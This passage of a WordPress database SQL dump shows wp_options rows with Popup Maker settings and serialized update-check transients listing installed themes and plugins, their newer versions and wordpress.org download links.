(3446129, 'pum_extend_viewed_extensions', 'a:3:{s:10:\"extensions\";i:16;s:5:\"forms\";i:4;s:13:\"page-builders\";i:1;}', 'yes'),
(3446134, '_pum_installed', '1', 'yes'),
(3446143, 'pum_all_theme_close_text_cache', 'a:7:{i:6182;s:5:\"CLOSE\";i:898;s:5:\"CLOSE\";i:899;s:2:\"×\";i:900;s:2:\"×\";i:901;s:2:\"×\";i:902;s:2:\"×\";i:903;s:2:\"×\";}', 'yes'),
(3447324, '_site_transient_update_themes', 'O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1651351822;s:7:\"checked\";a:10:{s:14:\"education-base\";s:5:\"1.4.2\";s:12:\"mh-campusmag\";s:5:\"1.0.3\";s:16:\"mh-magazine-lite\";s:5:\"2.7.5\";s:7:\"synapse\";s:5:\"1.1.1\";s:13:\"twentyfifteen\";s:3:\"1.9\";s:14:\"twentynineteen\";s:3:\"1.3\";s:15:\"twentyseventeen\";s:3:\"1.4\";s:13:\"twentysixteen\";s:3:\"1.4\";s:18:\"university-hub-pro\";s:3:\"2.1\";s:14:\"university-hub\";s:5:\"1.0.6\";}s:8:\"response\";a:8:{s:14:\"education-base\";a:6:{s:5:\"theme\";s:14:\"education-base\";s:11:\"new_version\";s:5:\"3.0.5\";s:3:\"url\";s:44:\"https://wordpress.org/themes/education-base/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/theme/education-base.3.0.5.zip\";s:8:\"requires\";s:3:\"4.8\";s:12:\"requires_php\";s:3:\"5.6\";}s:16:\"mh-magazine-lite\";a:6:{s:5:\"theme\";s:16:\"mh-magazine-lite\";s:11:\"new_version\";s:5:\"2.9.2\";s:3:\"url\";s:46:\"https://wordpress.org/themes/mh-magazine-lite/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/theme/mh-magazine-lite.2.9.2.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:3:\"5.6\";}s:7:\"synapse\";a:6:{s:5:\"theme\";s:7:\"synapse\";s:11:\"new_version\";s:5:\"1.2.2\";s:3:\"url\";s:37:\"https://wordpress.org/themes/synapse/\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/theme/synapse.1.2.2.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";b:0;}s:13:\"twentyfifteen\";a:6:{s:5:\"theme\";s:13:\"twentyfifteen\";s:11:\"new_version\";s:3:\"3.1\";s:3:\"url\";s:43:\"https://wordpress.org/themes/twentyfifteen/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/twentyfifteen.3.1.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:5:\"5.2.4\";}s:14:\"twentynineteen\";a:6:{s:5:\"theme\";s:14:\"twentynineteen\";s:11:\"new_version\";s:3:\"2.2\";s:3:\"url\";s:44:\"https://wordpress.org/themes/twentynineteen/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/twentynineteen.2.2.zip\";s:8:\"requires\";s:5:\"4.9.6\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:15:\"twentyseventeen\";a:6:{s:5:\"theme\";s:15:\"twentyseventeen\";s:11:\"new_version\";s:3:\"2.9\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentyseventeen/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentyseventeen.2.9.zip\";s:8:\"requires\";s:3:\"4.7\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:13:\"twentysixteen\";a:6:{s:5:\"theme\";s:13:\"twentysixteen\";s:11:\"new_version\";s:3:\"2.6\";s:3:\"url\";s:43:\"https://wordpress.org/themes/twentysixteen/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/twentysixteen.2.6.zip\";s:8:\"requires\";s:3:\"4.4\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:14:\"university-hub\";a:6:{s:5:\"theme\";s:14:\"university-hub\";s:11:\"new_version\";s:5:\"2.2.1\";s:3:\"url\";s:44:\"https://wordpress.org/themes/university-hub/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/theme/university-hub.2.2.1.zip\";s:8:\"requires\";s:3:\"5.6\";s:12:\"requires_php\";s:3:\"5.6\";}}s:12:\"translations\";a:0:{}}', 'no');
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(3447325, '_site_transient_update_plugins', 'O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1651351820;s:8:\"response\";a:12:{s:35:\"acme-demo-setup/acme-demo-setup.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:29:\"w.org/plugins/acme-demo-setup\";s:4:\"slug\";s:15:\"acme-demo-setup\";s:6:\"plugin\";s:35:\"acme-demo-setup/acme-demo-setup.php\";s:11:\"new_version\";s:5:\"2.0.7\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/acme-demo-setup/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/acme-demo-setup.2.0.7.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:68:\"https://ps.w.org/acme-demo-setup/assets/icon-128x128.jpg?rev=1724782\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:70:\"https://ps.w.org/acme-demo-setup/assets/banner-772x250.jpg?rev=1724790\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.8\";s:6:\"tested\";s:5:\"5.9.3\";s:12:\"requires_php\";s:6:\"5.6.20\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:37:\"breadcrumb-navxt/breadcrumb-navxt.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:30:\"w.org/plugins/breadcrumb-navxt\";s:4:\"slug\";s:16:\"breadcrumb-navxt\";s:6:\"plugin\";s:37:\"breadcrumb-navxt/breadcrumb-navxt.php\";s:11:\"new_version\";s:5:\"7.0.2\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/breadcrumb-navxt/\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/plugin/breadcrumb-navxt.7.0.2.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:69:\"https://ps.w.org/breadcrumb-navxt/assets/icon-256x256.png?rev=2410525\";s:2:\"1x\";s:61:\"https://ps.w.org/breadcrumb-navxt/assets/icon.svg?rev=1927103\";s:3:\"svg\";s:61:\"https://ps.w.org/breadcrumb-navxt/assets/icon.svg?rev=1927103\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:72:\"https://ps.w.org/breadcrumb-navxt/assets/banner-1544x500.png?rev=1927103\";s:2:\"1x\";s:71:\"https://ps.w.org/breadcrumb-navxt/assets/banner-772x250.png?rev=1927103\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.9\";s:6:\"tested\";s:3:\"6.0\";s:12:\"requires_php\";s:3:\"7.0\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:9:\"hello.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:9:\"hello.php\";s:11:\"new_version\";s:5:\"1.7.2\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/hello-dolly.1.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=2052855\";s:2:\"1x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=2052855\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/hello-dolly/assets/banner-1544x500.jpg?rev=2645582\";s:2:\"1x\";s:66:\"https://ps.w.org/hello-dolly/assets/banner-772x250.jpg?rev=2052855\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";s:6:\"tested\";s:5:\"5.8.4\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:19:\"members/members.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:21:\"w.org/plugins/members\";s:4:\"slug\";s:7:\"members\";s:6:\"plugin\";s:19:\"members/members.php\";s:11:\"new_version\";s:5:\"3.2.1\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/members/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/members.3.2.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:60:\"https://ps.w.org/members/assets/icon-256x256.png?rev=2503334\";s:2:\"1x\";s:60:\"https://ps.w.org/members/assets/icon-128x128.png?rev=2503334\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/members/assets/banner-1544x500.jpg?rev=2503334\";s:2:\"1x\";s:62:\"https://ps.w.org/members/assets/banner-772x250.jpg?rev=2503334\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.7\";s:6:\"tested\";s:5:\"5.9.3\";s:12:\"requires_php\";s:3:\"5.6\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:23:\"ml-slider/ml-slider.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:23:\"w.org/plugins/ml-slider\";s:4:\"slug\";s:9:\"ml-slider\";s:6:\"plugin\";s:23:\"ml-slider/ml-slider.php\";s:11:\"new_version\";s:6:\"3.27.3\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/ml-slider/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/ml-slider.3.27.3.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:62:\"https://ps.w.org/ml-slider/assets/icon-256x256.png?rev=2370840\";s:2:\"1x\";s:54:\"https://ps.w.org/ml-slider/assets/icon.svg?rev=1837669\";s:3:\"svg\";s:54:\"https://ps.w.org/ml-slider/assets/icon.svg?rev=1837669\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/ml-slider/assets/banner-1544x500.png?rev=1837669\";s:2:\"1x\";s:64:\"https://ps.w.org/ml-slider/assets/banner-772x250.png?rev=2370840\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.5\";s:6:\"tested\";s:5:\"5.9.3\";s:12:\"requires_php\";s:3:\"5.2\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:39:\"pdfjs-viewer-shortcode/pdfjs-viewer.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:36:\"w.org/plugins/pdfjs-viewer-shortcode\";s:4:\"slug\";s:22:\"pdfjs-viewer-shortcode\";s:6:\"plugin\";s:39:\"pdfjs-viewer-shortcode/pdfjs-viewer.php\";s:11:\"new_version\";s:5:\"2.1.7\";s:3:\"url\";s:53:\"https://wordpress.org/plugins/pdfjs-viewer-shortcode/\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/plugin/pdfjs-viewer-shortcode.2.1.7.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:75:\"https://ps.w.org/pdfjs-viewer-shortcode/assets/icon-256x256.png?rev=2301161\";s:2:\"1x\";s:75:\"https://ps.w.org/pdfjs-viewer-shortcode/assets/icon-128x128.png?rev=2301161\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:77:\"https://ps.w.org/pdfjs-viewer-shortcode/assets/banner-772x250.png?rev=2301161\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.9\";s:6:\"tested\";s:5:\"5.9.3\";s:12:\"requires_php\";s:3:\"7.2\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:27:\"popup-maker/popup-maker.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:25:\"w.org/plugins/popup-maker\";s:4:\"slug\";s:11:\"popup-maker\";s:6:\"plugin\";s:27:\"popup-maker/popup-maker.php\";s:11:\"new_version\";s:6:\"1.16.7\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/popup-maker/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/popup-maker.1.16.7.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/popup-maker/assets/icon-256x256.jpg?rev=2045655\";s:2:\"1x\";s:64:\"https://ps.w.org/popup-maker/assets/icon-128x128.jpg?rev=2045655\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/popup-maker/assets/banner-1544x500.jpg?rev=2045655\";s:2:\"1x\";s:66:\"https://ps.w.org/popup-maker/assets/banner-772x250.jpg?rev=2045655\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.9\";s:6:\"tested\";s:5:\"5.9.3\";s:12:\"requires_php\";s:3:\"5.6\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:37:\"post-types-order/post-types-order.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:30:\"w.org/plugins/post-types-order\";s:4:\"slug\";s:16:\"post-types-order\";s:6:\"plugin\";s:37:\"post-types-order/post-types-order.php\";s:11:\"new_version\";s:5:\"1.9.8\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/post-types-order/\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/plugin/post-types-order.1.9.8.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:69:\"https://ps.w.org/post-types-order/assets/icon-128x128.png?rev=1226428\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:72:\"https://ps.w.org/post-types-order/assets/banner-1544x500.png?rev=1675574\";s:2:\"1x\";s:71:\"https://ps.w.org/post-types-order/assets/banner-772x250.png?rev=1429949\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"2.8\";s:6:\"tested\";s:5:\"5.9.3\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:29:\"relative-url/relative-url.php\";O:8:\"stdClass\":14:{s:2:\"id\";s:26:\"w.org/plugins/relative-url\";s:4:\"slug\";s:12:\"relative-url\";s:6:\"plugin\";s:29:\"relative-url/relative-url.php\";s:11:\"new_version\";s:5:\"0.1.8\";s:3:\"url\";s:43:\"https://wordpress.org/plugins/relative-url/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/relative-url.0.1.8.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:65:\"https://ps.w.org/relative-url/assets/icon-256x256.png?rev=2581668\";s:2:\"1x\";s:57:\"https://ps.w.org/relative-url/assets/icon.svg?rev=1568302\";s:3:\"svg\";s:57:\"https://ps.w.org/relative-url/assets/icon.svg?rev=1568302\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/relative-url/assets/banner-1544x500.png?rev=2581668\";s:2:\"1x\";s:67:\"https://ps.w.org/relative-url/assets/banner-772x250.png?rev=2581668\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"2.1.0\";s:6:\"tested\";s:5:\"5.8.4\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";O:8:\"stdClass\":0:{}s:14:\"upgrade_notice\";s:121:\"<ul>\n<li>Compatibility check for 5.8, nothing new, just bump version to tell everyone this plugin still works.</li>\n</ul>\";}s:33:\"w3-total-cache/w3-total-cache.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:28:\"w.org/plugins/w3-total-cache\";s:4:\"slug\";s:14:\"w3-total-cache\";s:6:\"plugin\";s:33:\"w3-total-cache/w3-total-cache.php\";s:11:\"new_version\";s:5:\"2.2.1\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/w3-total-cache/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/w3-total-cache.2.2.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/w3-total-cache/assets/icon-256x256.png?rev=1041806\";s:2:\"1x\";s:67:\"https://ps.w.org/w3-total-cache/assets/icon-128x128.png?rev=1041806\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:69:\"https://ps.w.org/w3-total-cache/assets/banner-772x250.jpg?rev=1041806\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.8\";s:6:\"tested\";s:5:\"5.9.3\";s:12:\"requires_php\";s:3:\"5.6\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:39:\"wp-file-manager/file_folder_manager.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:29:\"w.org/plugins/wp-file-manager\";s:4:\"slug\";s:15:\"wp-file-manager\";s:6:\"plugin\";s:39:\"wp-file-manager/file_folder_manager.php\";s:11:\"new_version\";s:5:\"7.1.5\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/wp-file-manager/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/wp-file-manager.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:68:\"https://ps.w.org/wp-file-manager/assets/icon-128x128.png?rev=2491299\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:70:\"https://ps.w.org/wp-file-manager/assets/banner-772x250.jpg?rev=2491299\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";s:6:\"tested\";s:5:\"5.9.3\";s:12:\"requires_php\";s:5:\"5.2.4\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:47:\"wp-media-manager-lite/wp-media-manager-lite.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:35:\"w.org/plugins/wp-media-manager-lite\";s:4:\"slug\";s:21:\"wp-media-manager-lite\";s:6:\"plugin\";s:47:\"wp-media-manager-lite/wp-media-manager-lite.php\";s:11:\"new_version\";s:5:\"1.1.3\";s:3:\"url\";s:52:\"https://wordpress.org/plugins/wp-media-manager-lite/\";s:7:\"package\";s:70:\"https://downloads.wordpress.org/plugin/wp-media-manager-lite.1.1.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:74:\"https://ps.w.org/wp-media-manager-lite/assets/icon-256x256.png?rev=1699570\";s:2:\"1x\";s:74:\"https://ps.w.org/wp-media-manager-lite/assets/icon-128x128.png?rev=1699570\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:76:\"https://ps.w.org/wp-media-manager-lite/assets/banner-772x250.png?rev=1699570\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.8\";s:6:\"tested\";s:5:\"5.8.4\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";O:8:\"stdClass\":0:{}}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:11:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:5:\"4.2.3\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/akismet.4.2.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:59:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=969272\";s:2:\"1x\";s:59:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=969272\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:61:\"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"5.9.3\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";a:0:{}}s:23:\"awesplash/awesplash.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:23:\"w.org/plugins/awesplash\";s:4:\"slug\";s:9:\"awesplash\";s:6:\"plugin\";s:23:\"awesplash/awesplash.php\";s:11:\"new_version\";s:5:\"1.0.3\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/awesplash/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/awesplash.1.0.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:62:\"https://ps.w.org/awesplash/assets/icon-256x256.png?rev=1690733\";s:2:\"1x\";s:62:\"https://ps.w.org/awesplash/assets/icon-128x128.png?rev=1690733\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/awesplash/assets/banner-1544x500.jpg?rev=1690733\";s:2:\"1x\";s:64:\"https://ps.w.org/awesplash/assets/banner-772x250.jpg?rev=1690733\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.3\";}s:51:\"counter-number-showcase/counter-number-showcase.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:37:\"w.org/plugins/counter-number-showcase\";s:4:\"slug\";s:23:\"counter-number-showcase\";s:6:\"plugin\";s:51:\"counter-number-showcase/counter-number-showcase.php\";s:11:\"new_version\";s:5:\"1.2.8\";s:3:\"url\";s:54:\"https://wordpress.org/plugins/counter-number-showcase/\";s:7:\"package\";s:72:\"https://downloads.wordpress.org/plugin/counter-number-showcase.1.2.8.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/counter-number-showcase/assets/icon-256x256.png?rev=1704297\";s:2:\"1x\";s:76:\"https://ps.w.org/counter-number-showcase/assets/icon-128x128.png?rev=1704297\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:78:\"https://ps.w.org/counter-number-showcase/assets/banner-772x250.jpg?rev=1704297\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"5.9.3\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";a:0:{}}s:29:\"hide-featured-image/index.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:33:\"w.org/plugins/hide-featured-image\";s:4:\"slug\";s:19:\"hide-featured-image\";s:6:\"plugin\";s:29:\"hide-featured-image/index.php\";s:11:\"new_version\";s:5:\"1.3.1\";s:3:\"url\";s:50:\"https://wordpress.org/plugins/hide-featured-image/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/hide-featured-image.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:72:\"https://ps.w.org/hide-featured-image/assets/icon-256x256.png?rev=1882740\";s:2:\"1x\";s:72:\"https://ps.w.org/hide-featured-image/assets/icon-128x128.png?rev=1882740\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"3.0.1\";}s:19:\"jetpack/jetpack.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:21:\"w.org/plugins/jetpack\";s:4:\"slug\";s:7:\"jetpack\";s:6:\"plugin\";s:19:\"jetpack/jetpack.php\";s:11:\"new_version\";s:4:\"10.8\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/jetpack/\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/plugin/jetpack.10.8.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:60:\"https://ps.w.org/jetpack/assets/icon-256x256.png?rev=2638128\";s:2:\"1x\";s:52:\"https://ps.w.org/jetpack/assets/icon.svg?rev=2638128\";s:3:\"svg\";s:52:\"https://ps.w.org/jetpack/assets/icon.svg?rev=2638128\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/jetpack/assets/banner-1544x500.png?rev=2653649\";s:2:\"1x\";s:62:\"https://ps.w.org/jetpack/assets/banner-772x250.png?rev=2653649\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.8\";s:6:\"tested\";s:5:\"5.9.3\";s:12:\"requires_php\";s:3:\"5.6\";s:13:\"compatibility\";a:0:{}}s:48:\"easy-org-chart/pluginlyspeaking-easyorgchart.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:28:\"w.org/plugins/easy-org-chart\";s:4:\"slug\";s:14:\"easy-org-chart\";s:6:\"plugin\";s:48:\"easy-org-chart/pluginlyspeaking-easyorgchart.php\";s:11:\"new_version\";s:3:\"3.1\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/easy-org-chart/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/easy-org-chart.3.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/easy-org-chart/assets/icon-256x256.jpg?rev=1509177\";s:2:\"1x\";s:67:\"https://ps.w.org/easy-org-chart/assets/icon-128x128.jpg?rev=1509177\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:69:\"https://ps.w.org/easy-org-chart/assets/banner-772x250.png?rev=1705010\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.6\";}s:21:\"polylang/polylang.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:22:\"w.org/plugins/polylang\";s:4:\"slug\";s:8:\"polylang\";s:6:\"plugin\";s:21:\"polylang/polylang.php\";s:11:\"new_version\";s:5:\"3.2.2\";s:3:\"url\";s:39:\"https://wordpress.org/plugins/polylang/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/plugin/polylang.3.2.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:61:\"https://ps.w.org/polylang/assets/icon-256x256.png?rev=1331499\";s:2:\"1x\";s:61:\"https://ps.w.org/polylang/assets/icon-128x128.png?rev=1331499\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/polylang/assets/banner-1544x500.png?rev=1405299\";s:2:\"1x\";s:63:\"https://ps.w.org/polylang/assets/banner-772x250.png?rev=1405299\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.6\";s:6:\"tested\";s:5:\"5.9.3\";s:12:\"requires_php\";s:3:\"5.6\";s:13:\"compatibility\";a:0:{}}s:23:\"rt-slider/rt-slider.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:23:\"w.org/plugins/rt-slider\";s:4:\"slug\";s:9:\"rt-slider\";s:6:\"plugin\";s:23:\"rt-slider/rt-slider.php\";s:11:\"new_version\";s:5:\"1.0.6\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/rt-slider/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/rt-slider.1.0.7.zip\";s:5:\"icons\";a:1:{s:7:\"default\";s:53:\"https://s.w.org/plugins/geopattern-icon/rt-slider.svg\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.0\";}s:25:\"tablepress/tablepress.php\";O:8:\"stdClass\":14:{s:2:\"id\";s:24:\"w.org/plugins/tablepress\";s:4:\"slug\";s:10:\"tablepress\";s:6:\"plugin\";s:25:\"tablepress/tablepress.php\";s:11:\"new_version\";s:4:\"1.14\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/tablepress/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/tablepress.1.14.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/tablepress/assets/icon-256x256.png?rev=1064192\";s:2:\"1x\";s:63:\"https://ps.w.org/tablepress/assets/icon-128x128.png?rev=1064192\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/tablepress/assets/banner-1544x500.png?rev=1275767\";s:2:\"1x\";s:65:\"https://ps.w.org/tablepress/assets/banner-772x250.png?rev=1275767\";}s:11:\"banners_rtl\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/tablepress/assets/banner-1544x500-rtl.png?rev=1275767\";s:2:\"1x\";s:69:\"https://ps.w.org/tablepress/assets/banner-772x250-rtl.png?rev=1275767\";}s:8:\"requires\";s:3:\"5.6\";s:6:\"tested\";s:5:\"5.9.3\";s:12:\"requires_php\";s:6:\"5.6.20\";s:13:\"compatibility\";a:0:{}s:14:\"upgrade_notice\";s:99:\"<p>This update is a stability, maintenance, and compatibility release. Updating is recommended.</p>\";}s:40:\"wp-video-html5-video-player/video-js.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:41:\"w.org/plugins/wp-video-html5-video-player\";s:4:\"slug\";s:27:\"wp-video-html5-video-player\";s:6:\"plugin\";s:40:\"wp-video-html5-video-player/video-js.php\";s:11:\"new_version\";s:5:\"4.5.5\";s:3:\"url\";s:58:\"https://wordpress.org/plugins/wp-video-html5-video-player/\";s:7:\"package\";s:70:\"https://downloads.wordpress.org/plugin/wp-video-html5-video-player.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:80:\"https://ps.w.org/wp-video-html5-video-player/assets/icon-256x256.jpg?rev=1592635\";s:2:\"1x\";s:80:\"https://ps.w.org/wp-video-html5-video-player/assets/icon-128x128.jpg?rev=1592635\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"2.7\";}s:24:\"wordpress-seo/wp-seo.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:27:\"w.org/plugins/wordpress-seo\";s:4:\"slug\";s:13:\"wordpress-seo\";s:6:\"plugin\";s:24:\"wordpress-seo/wp-seo.php\";s:11:\"new_version\";s:4:\"18.6\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/wordpress-seo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/wordpress-seo.18.6.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:66:\"https://ps.w.org/wordpress-seo/assets/icon-256x256.png?rev=2643727\";s:2:\"1x\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=2363699\";s:3:\"svg\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=2363699\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500.png?rev=2643727\";s:2:\"1x\";s:68:\"https://ps.w.org/wordpress-seo/assets/banner-772x250.png?rev=2643727\";}s:11:\"banners_rtl\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500-rtl.png?rev=2643727\";s:2:\"1x\";s:72:\"https://ps.